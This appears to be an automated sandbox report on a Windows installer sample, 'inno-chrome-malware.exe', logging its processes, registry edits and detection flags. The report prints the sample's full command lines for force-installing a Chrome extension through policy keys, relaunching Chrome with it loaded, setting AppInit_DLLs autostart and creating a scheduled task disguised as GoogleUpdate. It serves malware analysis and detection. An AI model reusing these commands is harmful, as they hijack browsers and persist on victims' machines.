Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 1
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1844,i,10208979890822883720,14269069191704326232,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp File created: C:\Users\user\AppData\Local\Programs Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe File created: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp Jump to behavior
Source: classification engine Classification label: mal68.phis.winEXE@169/23@22/13
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4784:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp File created: C:\Program Files\WinApps Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\ServiceApp\install.bat" install
Source: InstallExtension.exe String found in binary or memory: \ServiceApp\apps-helper
Source: InstallExtension.exe String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
Source: InstallExtension.exe String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
Source: InstallExtension.exe String found in binary or memory: " --no-startup-window --load-extension="
Source: InstallExtension.exe String found in binary or memory: <StopAtDurationEnd>false</StopAtDurationEnd>
Source: InstallExtension.exe String found in binary or memory: <StopAtDurationEnd>false</StopAtDurationEnd>
Source: InstallExtension.exe String found in binary or memory: set helper=%LocalAppdata%\ServiceApp\apps-helper
Source: InstallExtension.exe String found in binary or memory: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
Source: InstallExtension.exe String found in binary or memory: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
Source: InstallExtension.exe String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
Source: InstallExtension.exe String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
Source: InstallExtension.exe String found in binary or memory: <StopAtDurationEnd>false</StopAtDurationEnd>
Source: InstallExtension.exe String found in binary or memory: <StopAtDurationEnd>false</StopAtDurationEnd>
Source: InstallExtension.exe String found in binary or memory: set helper=%LocalAppdata%\ServiceApp\apps-helper
Source: InstallExtension.exe String found in binary or memory: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
Source: InstallExtension.exe String found in binary or memory: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
Source: inno-chrome-malware.exe String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_08e0c10ba840a28a\MSVCR90.dll Jump to behavior
Source: inno-chrome-malware.exe Static file information: File size 1668264 > 1048576
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Directory created: C:\Program Files\WinApps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater
Source: inno-chrome-malware.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp" /SL5="$4003C,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe"
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp" /SL5="$B02CA,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe" /SILENT
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp" /SL5="$4003C,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe" Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp" /SL5="$B02CA,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe" /SILENT Jump to behavior
PE file contains sections with non-standard names
Source: inno-chrome-malware.exe Static PE information: section name: .didata
Source: inno-chrome-malware.tmp.0.dr Static PE information: section name: .didata
Source: inno-chrome-malware.tmp.2.dr Static PE information: section name: .didata

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp File created: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp File created: C:\Users\user\AppData\Local\Temp\is-D64IN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\Desktop\inno-chrome-malware.exe File created: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Jump to dropped file
Source: C:\Users\user\Desktop\inno-chrome-malware.exe File created: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp File created: C:\Users\user\AppData\Local\Temp\is-OO1S3.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp File created: C:\Users\user\AppData\Local\ServiceApp\is-G6FEV.tmp Jump to dropped file
Installs a Chrome extension
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Windows\System32\reg.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\timeout.exe TID: 2472 Thread sleep count: 34 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D64IN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OO1S3.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: 8_2_00007FF68FF11160 ??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,FindFirstFileW,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@0@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,GetFileAttributesW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@PEB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,printf,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@PEB_W@Z,?find@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEBA_KPEB_W_K@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@0@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@0@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,GetFileAttributesW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,FindNextFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ, 8_2_00007FF68FF11160
Source: InstallExtension.exe, 0000002D.00000002.551162992.0000000000560000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: 8_2_00007FF68FF12E80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,__crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,__crt_debugger_hook,GetCurrentProcess,TerminateProcess, 8_2_00007FF68FF12E80
Enables debug privileges
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: 8_2_00007FF68FF12E80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,__crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,__crt_debugger_hook,GetCurrentProcess,TerminateProcess, 8_2_00007FF68FF12E80
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: 8_2_00007FF68FF135C4 SetUnhandledExceptionFilter, 8_2_00007FF68FF135C4
Uses taskkill to terminate processes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process created: C:\Users\user\Desktop\inno-chrome-malware.exe "C:\Users\user\Desktop\inno-chrome-malware.exe" /SILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://getfiles.wiki/welcome.php Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsext.dll" /f Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn GoogleUpdate Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn GoogleUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
